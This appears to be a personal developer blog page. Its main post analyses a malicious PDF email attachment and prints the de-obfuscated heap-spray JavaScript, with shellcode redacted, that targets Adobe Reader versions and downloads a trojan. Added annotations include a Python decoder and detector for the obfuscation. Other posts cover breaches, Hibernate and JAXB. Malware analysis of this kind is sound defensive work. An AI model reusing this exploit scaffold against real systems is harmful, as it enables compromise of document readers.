Updates from Nickolas Golubev

  • Nickolas Golubev 22:59 on January 28, 2013

    Decoding a PDF Virus E-Mail 

    Today I received a malicious email via Gmail.

    Title: “Check this. It might be useful for u.”
    From: XXXX@aol.com via mx.aol.com 11:55 AM (2 hours ago) to Nick

    The body contained some garbled HTML and a MIME PDF attachment, “621624.pdf”.

    The email came from someone who must have had me in their address book, as I had communicated with them years ago.

    Of course I had to investigate, so I uploaded the PDF to jeek.org for further analysis.


    The PDF contained a hidden JavaScript package which was further obfuscated.

    After manually de-obfuscating the code I came up with:

    var encoded = "a3tf31jre0........."; // (redacted)
    var decode1 = encoded.replace(/a3tf31jre/g, "%");
    var decoded = unescape(decode1);

    The encoded string breaks out to:

    var j_IgC = [31, 31, 15, 23];

    function _k_m() {
        return app;
    }

    function _b_(xVgFqV) {
        var ___N = "";
        ___N = unescape(xVgFqV);
        return ___N;
    }

    function get_ver() {
        var ver = _k_m().viewerVersion.toString();
        ver = ver.replace(".", "");
        while (ver.length < 4)
            ver += "0";
        ver = parseInt(ver, 10);
        return ver;
    }

    function make_block(xVgFqV, len) {
        while (xVgFqV.length * 2 < len)
            xVgFqV += xVgFqV;
        xVgFqV = xVgFqV.substring(0, len / 2);
        return xVgFqV;
    }

    function heap_spray3(scode) {
        scode = _b_(scode);
        var sclen = scode.length * 2;
        var fasdds = _b_("%u9090");
        var spray = make_block(fasdds, 0x2000 - sclen);
        var block = scode + spray;
        block = make_block(block, 0x80000 - 0x40);
        for (var i = 0; i < 0x190; i++)
            j_IgC[i] = block.substr(0, block.length - 1) + fasdds;
    }

    function make_str(xVgFqV, len) {
        while (xVgFqV.length < len) { xVgFqV += xVgFqV; }
        xVgFqV = xVgFqV.substring(0, len);
        return xVgFqV;
    }

    function num2hex(num) {
        var xVgFqV = num.toString(16);
        var len = xVgFqV.length;
        var ret = (len % 2) ? "0" + xVgFqV : xVgFqV;
        return ret;
    }

    function str2uni(xVgFqV) {
        var ret = "";
        for (var i = 0; i < xVgFqV.length; i += 2) {
            ret += "%u";
            ret += num2hex(xVgFqV.charCodeAt(i + 1));
            ret += num2hex(xVgFqV.charCodeAt(i));
        }
        return ret;
    }

    function hex2str(hex) {
        var ret = "";
        for (var i = 0; i < hex.length; i += 2) {
            var b = hex.substr(i, 2);
            var num = parseInt(b, 16);
            ret += String.fromCharCode(num);
        }
        return ret;
    }

    exploit();

    function exploit() {
        var ver = get_ver();
        if (ver >= 8000) {
            var tiff = "SUkqADggAABB";
            var nops = make_str("QUFB", 0x2ae8);
            var start = "..."; // (redacted)
            var foot = "";
            var sc_hex = "";

            if (ver < 8201) {
                foot = "..."; // (redacted)
                var sc_hex = "..."; // (redacted)
            } else { // if/else structure restored; the extraction had flattened both branches
                foot = "..."; // (redacted)
                sc_hex = "..."; // (redacted)
            }

            if (foot.length) {
                var ret = [tiff, nops, start, foot].join("");
                var sc_str = hex2str(sc_hex);
                var scode = str2uni(sc_str);
                pwzh6lr.rawValue = ret;
            }
        }
    }

    After the PDF viewer is “heap sprayed” ( http://en.wikipedia.org/wiki/Heap_spraying ) the exploit payload that is injected goes out to download http://earthexplore.com/PDFS/XXXXXXX.exe (redacted). I have not analyzed the executable itself but would imagine that it is some sort of a trojan.
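    As an added analysis-side illustration (not code from the post), the Python below models the first obfuscation layer described above (JavaScript escape() with every "%" swapped for the token a3tf31jre), reverses it with a JavaScript-compatible unescape, replicates the sample's get_ver() so an analyst can tell which Acrobat viewerVersion strings fall in the targeted range, and flags the heap-spray indicators visible in the decoded script. The inner script is a constructed stand-in for the redacted payload.

```python
import re

# Token from the post's first layer; INNER_JS is a constructed stand-in for
# the real (redacted) inner script, chosen to carry the same tell-tale calls.
TOKEN = "a3tf31jre"
INNER_JS = ('var fasdds = unescape("%u9090");\n'
            'var ver = app.viewerVersion.toString();')

def js_escape(s):
    """Simplified JavaScript escape(): [A-Za-z0-9@*_+-./] pass through,
    everything else becomes %XX (sufficient for an ASCII script body)."""
    return "".join(c if c.isalnum() or c in "@*_+-./" else "%%%02X" % ord(c)
                   for c in s)

def obfuscate(js, token=TOKEN):
    """Model the dropper's outer layer: escape(), then swap '%' for the token."""
    return js_escape(js).replace("%", token)

def js_unescape(s):
    """Emulate JavaScript unescape(): %uXXXX -> U+XXXX, %XX -> U+00XX, in one
    left-to-right pass so a freshly decoded '%' is not re-interpreted."""
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def decode_layer1(encoded, token=TOKEN):
    """The two-step decode the post describes: token -> '%', then unescape."""
    return js_unescape(encoded.replace(token, "%"))

# Indicators an analyst would flag in decoded PDF JavaScript; the post's
# de-obfuscated sample exhibits every one of them.
HEAP_SPRAY_SIGNS = [
    (r"%u9090", "unicode NOP sled (%u9090)"),
    (r"\bunescape\s*\(", "unescape() building binary strings"),
    (r"viewerVersion", "Acrobat version fingerprinting"),
    (r"0x[0-9a-fA-F]{4,}", "large block-size constants (spray sizing)"),
    (r"while\s*\(\s*\w+\.length\s*\*?\s*2?\s*<", "string-doubling block builder"),
]

def score_heap_spray(js):
    """Return the description of every indicator present in decoded JS."""
    return [desc for pat, desc in HEAP_SPRAY_SIGNS if re.search(pat, js)]

def get_ver_as_exploit(viewer_version):
    """Replicate the sample's get_ver(): drop the first '.', right-pad with
    '0' to four characters, then parseInt (leading digits only).
    Note the quirks: "9.4.5" becomes "94.5" -> 94, and "10.1" -> 1010."""
    v = viewer_version.replace(".", "", 1)
    v = v + "0" * (4 - len(v))
    m = re.match(r"\d+", v)
    return int(m.group()) if m else None
```

    The get_ver quirk matters for triage: a three-component version string or a 10.x viewer is pushed below the 8000 threshold, so the sample silently skips those readers.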

  • Nickolas Golubev 18:54 on June 23, 2011

    The dangers of stovepipe security 

    The recent events with Sony ( http://www.pcworld.com/businesscenter/article/229351/sony_hacked_again_how_not_to_do_network_security.html ) have got me thinking about the dangers of “stovepipe” security ( http://en.wikipedia.org/wiki/Stovepipe_%28organisation%29 ).

    A stovepipe is an organizational structure that hinders cross-organizational communication and collaboration. It can be theorized that the different sub-companies / groups within Sony worked in a stovepipe security model: there was likely no over-arching security guidance / policy or common, authoritative security department.

    Large enterprises should always have a clear and common security policy and a common corporate security department. Information about attacks and fixes at one department should be shared with the others in an effort to limit any further damage.

    Lastly, an organization should follow established security standards like ISO 27002 ( http://en.wikipedia.org/wiki/ISO/IEC_27002 ). Why re-invent the wheel when a proven, practical methodology already exists?

  • Nickolas Golubev 19:17 on April 7, 2011

    Sometimes I feel like this is very true! 

    Ideally a well-structured project would define scope and architecture before any code has been written. In reality, cowboy coding happens more often than not.

  • Nickolas Golubev 20:19 on March 29, 2011

    MySQL website compromised by blind SQL injection attack 

    I found this news story to be quite ironic: http://www.h-online.com/security/news/item/MySQL-allegedly-hacked-via-SQL-injection-1216281.html

    Apparently the public-facing mysql.com site was attacked through a blind SQL injection attack ( https://secure.wikimedia.org/wikipedia/en/wiki/SQL_injection#Blind_SQL_injection ), and the internal database structure was published by the hacker as proof.

    It really shows why Injection is #1 on the OWASP Top 10 list ( http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project ) when a large SQL vendor (owned by Oracle) can’t even protect against blind SQL injection on their public-facing site!

  • Nickolas Golubev 16:55 on March 24, 2011

    Cryptic Hibernate Reverse Engineering Wizard Error 

    Today I tried to create some POJOs / HBM files automatically from a legacy database using the NetBeans 6.8 Hibernate tools. Everything was going great: I could connect to the database using my hibernate.cfg.xml file from the actual code, but then I ran the “Hibernate Reverse Engineering Wizard”…

    Problem #1: It could not find my hibernate.cfg.xml, and I had to copy this file into the actual package directory where I was trying to generate the files.

    Problem #2: Okay, the hibernate.cfg.xml was now read, but a new error showed up: “Database drivers are not added to the project classpath. Go to project properties to add database library.”

    After some digging around I finally figured out that the error is somewhat cryptic. The Microsoft SQL Server JDBC 4 library was actually on the path; the real problem was the connection string and the lack of an explicitly specified connection driver class.

    Previously I had:


    This had to be changed to:


    Now the wizard did not error out anymore, success!

    Problem #3: While the wizard no longer errored out, it also did not show a list of available tables. No matter, though: it did generate a very generic hibernate.reveng.xml file. The “New Hibernate Mapping Files and POJOs From Database” wizard accepted this file and created POJOs / HBM for every single table in the database. The only issue here was that I had to manually delete the default sys. schema tables, which were of no use to me.

  • Nickolas Golubev 20:03 on March 22, 2011

    Unicode Technical Report #36 Unicode Security Considerations 

    This is an interesting read from the Unicode Consortium:
    http://unicode.org/reports/tr36/ “Unicode Technical Report #36 Unicode Security Considerations”

    A great read on how Unicode character input and subsequent normalisation can be used as an attack vector.

  • Nickolas Golubev 16:06 on March 22, 2011

    Full circle: POJO to XSD to JAXB Generated Object 

    I have been exploring the most simple ways to serialise / generate XML from a POJO. I have used XStream a few years ago but wanted to try the JAXB Marshaller instead.

    I added some @XmlRootElement annotations to my POJO and child POJO (I guess making them less POJO like in the process).

    Then the @XmlTransient annotation had to be added to the child’s parent reference in order to avoid the “A cycle is detected in the object graph. This will cause infinitely deep XML” error and make JAXB ignore this reference on serialization.

    Generating XML at that point was pretty simple:

    java.io.StringWriter xmlSW = new StringWriter();
    JAXBContext jaxbContext = JAXBContext.newInstance(myPojo.getClass());
    Marshaller marshaller = jaxbContext.createMarshaller();
    marshaller.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, true);
    marshaller.setProperty(Marshaller.JAXB_ENCODING, "UTF-8");
    marshaller.marshal(myPojo, xmlSW);
    log.debug("Our XML: " + xmlSW.toString());

    Then to get the XSD and write it out:

    // Assumed imports (the post does not show them): javax.xml.bind.JAXBContext,
    // javax.xml.bind.SchemaOutputResolver, javax.xml.transform.Result,
    // javax.xml.transform.dom.DOMResult, org.w3c.dom.Document, java.util.List,
    // java.util.ArrayList, and the Xerces serializer classes
    // org.apache.xml.serialize.OutputFormat / XMLSerializer.
    java.io.StringWriter xsdSW = new StringWriter();
    JAXBContext jaxbContext = JAXBContext.newInstance(myPojo.getClass());
    final List<DOMResult> results = new ArrayList<DOMResult>();
    // generateSchema() calls createOutput() once per namespace; collect each DOMResult
    jaxbContext.generateSchema(new SchemaOutputResolver() {
        public Result createOutput(String ns, String file) throws IOException {
            DOMResult result = new DOMResult();
            result.setSystemId(file); // JAXB rejects a Result without a system id
            results.add(result);
            return result;
        }
    });
    DOMResult domResult = results.get(0);
    Document doc = (Document) domResult.getNode();
    OutputFormat format = new OutputFormat(doc);
    XMLSerializer serializer = new XMLSerializer(xsdSW, format);
    serializer.serialize(doc);

    log.debug("Our XSD: " + xsdSW.toString());

    The cool thing that can be done now with the XSD is to run it through the JAXB generator which will re-create the parent and child classes automatically, with even more (somewhat assumed) annotations.

    Just thought it was cool how you can go from POJO to XML/XSD and back to a POJO relatively easily. It is somewhat similar to what you can do with WSDLs: creating web services and web service clients with skeleton code around them using JAXB.
